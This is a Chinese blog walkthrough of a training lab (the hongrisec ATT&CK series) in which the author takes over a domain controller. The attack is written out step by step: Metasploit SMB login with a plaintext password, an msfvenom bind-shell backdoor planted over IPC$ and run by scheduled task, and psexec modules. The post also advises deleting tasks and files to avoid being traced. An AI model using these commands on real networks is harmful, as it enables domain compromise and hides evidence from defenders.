标签：CK set 域控制器 bind 192.168 ATT exe psexec 52.138

信息收集

信息收集 域控制器的相关信息：

通过arp扫描发现域控制器的ip地址为：192.168.52.138，尝试使用msf的smb_login模块登录smb是否成功

1 search smb_login
2 use 0
3 set rhosts 192.168.52.138
4 set smbpass hongrisec@2022
5 set smbuser Administrator
6 set smbdomain GOD
7 run

用户名、密码、domain我在前面一篇文章中已经获取到了，所以这里不再赘述，如果还不了解获取方式的，烦请移步至文章《内网横向渗透 之 ATT&CK系列一 之 信息收集》中查看(已附超链接)，上图表示用户名以及密码是正确的。

拿下域控

一、IPC$搭配msf木马

因为是内网域，目标主机不出网，所以 payload 使用 正向连接 (bind)

1 # 生成木马
2 msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.52.138 LPORT=3333 -f exe -o bind.exe
3 # 然后通过蚁剑上传至跳板机(win7)

使用 跳板机(win7) 进行空管链接(IPC$)

1 # IPC$ 远程登录目标主机
2 net use \\192.168.52.138\ipc$ /user:Administrator "hongrisec@2022"

提示：命令执行成功，下一步

1 # 复制后门到域控的temp目录下
2 copy bind.exe \\192.168.52.138\c$\bind.exe

查看是否上传成功：

1 # 查看指定目录下的文件
2 dir \\192.168.52.138\c$

创建计划任务

1 # 查看目标主机的时间
2 net time \\192.168.52.138
3 # 创建该时间之后的某个时刻计划任务，任务名 spmonkey
4 at \\192.168.52.138 12:40:00 c:\bind.exe
7 # 删除创建的任务
8 at \\192.168.52.138 2 /delete

返回msf监听端口

1 exit # 退出shell模式
2 backgroud # 后台运行session
3 use exploit/multi/handler
4 set payload windows/meterpreter/bind_tcp
5 set RHOST 192.168.52.138
6 set LPORT 3333
7 run
8 # 静候计划任务执行

当计划任务的时间到了后，依然没有会话回来，这个拿shell方式宣告失败！

注：计划任务执行完后，记得使用命令删除任务，不然会被溯源。

二、利用msf中的psexec模块拿下域控

psexec科普

psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开机3389端口，只需要对方开启admin$共享(该共享默认开启)。但是，假如目标主机开启了防火墙，psexec也是不能使用的，会提示找不到网络路径。由于psexec是windows提供的工具，所以杀毒软件会将其添加到白名单中。

psexec的基本原理是：通过管道在远程目标机器上创建一个psexec服务，并在本地磁盘中生成一个名为"PSEXESVC"的二进制文件。然后，通过psexec服务运行命令，运行结束后删除服务。

在使用psexec执行远程命令时，会在目标系统中创建一个psexec服务。命令执行后，psexec服务将会被自动删除。由于创建或删除服务时会产生大量的日志，所以会在攻击溯源时通过日志反推攻击流程。

1 search psexec # 查找psexec模块
2 use exploit/windows/smb/psexec
3 set payload windows/meterpreter/bind_tcp
4 set RHOSTS 192.168.52.138
5 set SMBPass hongrisec@2022
6 set SMBUser Administrator
7 set SMBDomain GOD
8 run

攻击成功了，但是没有生成session，这个方式也宣告失败！

三、利用python的psexec脚本拿下域控

经过查阅各种资料，发现有个psexec的python脚本，在这里感谢写这个脚本的师傅：beto (@agsolino)。

在kali中使用git获取脚本：git clone https://github.com/CoreSecurity/impacket.git，将kali的python版本修改至 3.*，cd进入impacket目录，运行python setup.py install，待执行完成后，准备工作就完成了。

开始拿下域控：

1、查找psexec脚本所在目录并进入目录

1 find . -name "psexec*"

2、使用代理隧道运行psexec.py脚本

1 proxychains python psexec.py 'Administrator:hongrisec@2022@192.168.52.138'

其中 ' ' 的值分别为 用户名:密码@目标主机ip地址

成功返回shell，查看权限

进入目录删除前面上传的msf木马

1 cd C:\
2 del/f/s/q C:\bind.exe

鸣谢

beto (@agsolino)

结语

到这里，拿下域控后，ATT&CK系列一 也就告一段落了，涉及到的知识点比较多，有不懂的师傅可以加我vx：fbi041699，备注明来意喔！

 

标签：CK,set,域控制器,bind,192.168,ATT,exe,psexec,52.138
来源： https://www.cnblogs.com/spmonkey/p/16262105.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。